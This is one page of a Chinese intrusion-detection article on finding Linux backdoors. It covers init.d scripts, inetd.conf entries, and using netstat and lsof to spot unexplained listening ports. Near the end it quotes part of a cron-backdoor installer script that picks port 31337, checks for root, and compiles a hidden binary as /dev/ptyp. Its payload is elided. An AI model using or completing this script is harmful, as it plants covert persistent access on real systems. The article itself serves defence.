Linux下后门查找初步

| 首页 | 下载中心 | 学院 | 视频 | 书籍 | 模板 | 素材 | 空间评测 | 代理 | 站长服务 | 论坛 | 图库 | 数码 |

您现在的位置：网站高手 >> 学院 >> 网管知识 >> 入侵检测 >> 正文

用户登录

新用户注册

Linux下后门查找初步作者：佚名文章来源：不详点击数：更新时间：2005-11-3

的程序。

确信rc?.d目录中脚本文件都是到/etc/rc.d/init.d或/etc/init.d目录中某个脚本文件
的符号连接、硬链接后，再cd到/etc/rc.d/init.d或/etc/init.d目录下。检查init.d
目录下的脚本文件。如果某个脚本启动的服务进程与名称不符，或者脚本文件的内容被修
改，加有别的什么东西启动了别的进程，必须仔细检查，极可能是被用来启动后门进程。

除此之外，与二进制木马后门相交叉，对init.d目录下脚本文件启动的每一个程序本身，
都要仔细检查，运行起来看看有没有什么不正常的现象，防止它有可能被换成木马。对于
init.d目录中的脚本文件启动的程序，它们的二进制文件大都在/usr/bin、
/usr/local/bin、/sbin、/usr/sbin目录下。

2) 检查/etc/inetd.conf配置文件

注意/etc/inetd.conf中的语法

#
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

和，这两个字段的关系就象execve()函数的第一个形参和第二
形参。检查/etc/inetd.conf，特别是最后两个字段，是否除通常的服务外启动了别的服务。
如果有的话，仔细检查这项服务，很可能是在启动后门程序。

同样，与binary木马后门相交叉，对inet.conf所列的每项服务，都要对相应程序进行检
查，很有可能它们被换成木马程序。

3) 使用netstat和lsof命令

如果后门程序作为守护进程启动，通常它侦听某个端口，通过该端口与外网连接。攻击者
借此获取对系统的访问。

对Linux系统，用"netstat -nap"命令列出网络状态信息，特别注意和
这两栏。如果所列的中 ":" 后给出端口处于侦听
状态，而系统又没有在这个端口启动服务，从这栏追踪对应程序，
它肯定是后门程序。如果中某端口与另一端建立了连接，系统没有在该
端口上配置服务，从栏中检查建立该连接的程序，如果程序不是通
常系统配置允许使用的客户程序，仔细检查该程序，它属于不正常的行为，很可能是后门
程序。

对Solaris系统，先用"netstat -na"列出网络状态信息，取出栏中的
local_host_addr:port。再执行"lsof -i tcp@local_host_addr:port"命令，或者对UDP
协议执行"lsof -i udp@local_host_addr:port"命令，这样就得到了netstat命令没有列
出的。随后按上面Linux系统一样的方式来做。注意，这里的
local_host_addr 是本机的IP地址或主机名，也可以简化为 tcp:port 或 udp:port，还
可以加上 -T[q、s、w 任意组合] 选项列出队列长度、状态、窗口大小信息。

对于raw socket，用"lsof -n | grep raw"命令进行检查。

5. cron后门

除了以守护进程方式启动后门，还可以利用cron机制启动后门，下面就是植入这类后门的
一个脚本

-------------------------------------------------------------------------------
#! /sbin/sh
# Which port should the shell start on
PORT="31337"
# Where (and under what name) to hide the socket demon
HIDE="/dev/ptyp"
# Time when the demon should start (0-23 h, military time)
START="2"
# Same like above but when should it stop
STOP="3"

if [ "`whoami`" != "root" ]; then
echo "you had to be root to do this!"
exit 1
fi

echo "#define PORT " $PORT > backdoor.c
cat >> backdoor.c << 'EOF'
... ...
EOF
gcc -O3 -o $HIDE backdoor.c

if [ -f $HIDE ]; then
echo "Compiling done"
rm -f backdoor.c
else
echo "Unable to compile"
rm -f backdoor.c

上一页 [1] [2] [3] [4] [5] [6] [7] 下一页

网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）　　去网站高手技术论坛讨论...

文章录入：admin 责任编辑：admin 【发表评论】【告诉好友】【打印此文】【关闭窗口】
	上一篇文章：入侵系统恢复指南下一篇文章：远程控制软件VNC对内网机器控制实现